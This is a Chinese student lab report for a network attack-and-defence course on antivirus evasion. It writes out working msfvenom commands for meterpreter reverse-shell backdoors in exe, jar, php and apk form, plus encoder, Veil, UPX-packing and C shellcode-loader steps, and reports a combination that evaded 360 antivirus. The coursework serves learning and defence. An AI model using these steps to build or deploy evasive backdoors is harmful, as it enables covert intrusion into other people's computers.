2019-2020-2 20175203马羽达《网络对抗技术》Exp3 免杀原理与实践
1.1方法
1.1.1正确使用msf编码器
1.1.2msfvenom生成如jar之类的其他文件
1.1.3veil
1.1.4加壳工具
1.1.5使用C + shellcode编程
1.1.6使用其他课堂未介绍方法
1.2通过组合应用各种技术实现恶意代码免杀
2.1基础问题回答
2.1.1杀软是如何检测出恶意代码的?
2.1.2免杀是做什么?
2.1.3免杀的基本方法有哪些?
2.1.4开启杀软能绝对防止电脑中恶意代码吗?
2.2.实践总结与体会
1.1方法
1.1.1正确使用msf编码器
在kali终端中,输入msfvenom查看该命令的参数详情,选用msfvenom -l encoders就能够查看编码器情况了。
将原来实验二中的后门程序发送至网站virustotal.com进行审查,如图所示
果然是一点隐蔽性都没有,轻松被看出来。
kali终端中输入cd /usr/share/metasploit-framework/modules/payloads/stagers/windows进入文件夹,ls查看Windows平台下的连接方式
之后,cd /usr/share/metasploit-framework/modules/encoders/x86进入文件夹,ls查看x86的编码方式
输入命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 52 -b 'x00' LHOST=192.168.113.131 LPORT=5203 -f exe > mydexptriBD.exe生成mydexptriBD.exe,检测如下:
就少了一个,没啥大用。。。看来杀软还是比较厉害的哈哈哈哈哈
1.1.2msfvenom生成如jar之类的其他文件
kali终端输入msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.113.131 lport=5203 x> myd175203_backdoor_java.jar生成Java后门程序
导出后进行检测如下:
有了很大的改观,但是还是被一半的检测到
大同小异,输入msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.113.131 lport=5203 x> myd175203_backdoor.php生成php程序
导出后进行检测如下:
厉害了!!!就剩三个了,这里还是要吹一手卡巴斯基的!
输入msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.113.131 lport=5203 x> myd175203_backdoor.apk生成apk文件(安装包,用于安卓)
导出后进行检测如下:
被三分之一的检测到了,但是手机上一般没有什么杀毒的习惯,所以还是要警惕这类的了
1.1.3veil
安装过程简直是。。。一言难尽,那么就先说一下吧,首先,安装第一遍没问题,然后输入veil会提示让你继续升级,这时候问题就来了,你需要有足够流畅的网络,之后下完一遍后,会发现它打不开,并提示你输入运行一条指令,在普通模式下输入后进入下载,有好多个错误是由于没有管理员权限所以无法实现,那么我们进入管理员模式进行相同操作,这时候,先更新架构dpkg --add-architecture i386
,apt-get update,apt-get install wine32,然后安装veil-evasionapt-get install veil-evasion就大功告成了!希望对大家有帮助,之后就是打开veil
输入use evasion进入Veil-Evasion
use c/meterpreter/rev_tcp.py进入配置界面
set LHOST 192.168.113.131设置反弹连接IP
set LPORT 5203设置端口
输入generate生成后门程序文件,将程序命名为veilmyd
按照提示即可在系统文件夹找到相关程序,检测如下:
不太行啊小老弟。。。
1.1.4加壳工具
使用命令upx mydexptriBD.exe -o myd175203.upxed.exe加压缩壳
导出后进行检测如下:
没有更好的改观
1.1.5使用C + shellcode编程
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.113.131 LPORT=5203 -f c生成C语言下的shellcode数组
mkdir myd175203.c创建c文件
“shellcode数组”
int main()
{
int (*func)() = (int(*)())buf;
func();
}
输入i686-w64-mingw32-g++ myd175203.c -o myd1752203.exe交叉编译
导出后进行检测如下:
还是2/3,不算成功。。。
1.1.6使用其他课堂未介绍方法
在veil中输入use evasion进入Veil-Evasion
use 29选择第29个,
set USERNAME myd输入用户名,选择平台2,其他的都是kail相关的一些ip,端口等等如图:
生成文件名称默认,类型选择2,成为一个exe文件,发现是生成一个指令:
在主机中检测:
厉害了!!!
1.2通过组合应用各种技术实现恶意代码免杀
采用C语言调用bloxor编码的shellcode+加壳方式达成免杀目的
杀软:360
系统:win10
keil中msfvenom -p windows/meterpreter/reverse_tcp -e x86/bloxor LHOST=192.168.113.131 LPORT=5203 -f c生成shellcode数组,在主机c语言程序codeblocks中进行编译,在debug里找到exe程序,keil中upx 17523myd.exe -o myd_bloxor_upxed.exe加壳
一复制就被检测到了。。。gg
加壳后在主机里进行查杀,没找到!!!
也不知道是该高兴还是不高兴,,,
2.1基础问题回答
2.1.1杀软是如何检测出恶意代码的?
杀软有自己的特征库,就是我们需要更新的病毒库,通过对其特征或者进程行为的比对进行检测。
2.1.2免杀是做什么?
模糊恶意程序的特征行为,达到伪装,不被检测的目的。
2.1.3免杀的基本方法有哪些?
生成如jar之类的其他文件,加壳,使用C + shellcode编程等等
2.1.4开启杀软能绝对防止电脑中恶意代码吗?
当然不能,恶意软件进行更新,你在软件库里找不到同样类型的,就无法防范,但是开启杀毒软件还是能有效防范大部分恶意代码的。
2.2.实践总结与体会
本次实验让我更加深刻的了解了恶意代码的伪装过程,对keil的使用也有了近一步的熟练,收获还是很多的,尤其是在自主安装成功veil后,简直不要太快乐!(虽然好像不是一件很厉害的事情),由实验回归到现实,我把电脑360的病毒库设置为了wifi下自动更新,真的怕自己的电脑突然暴毙。。。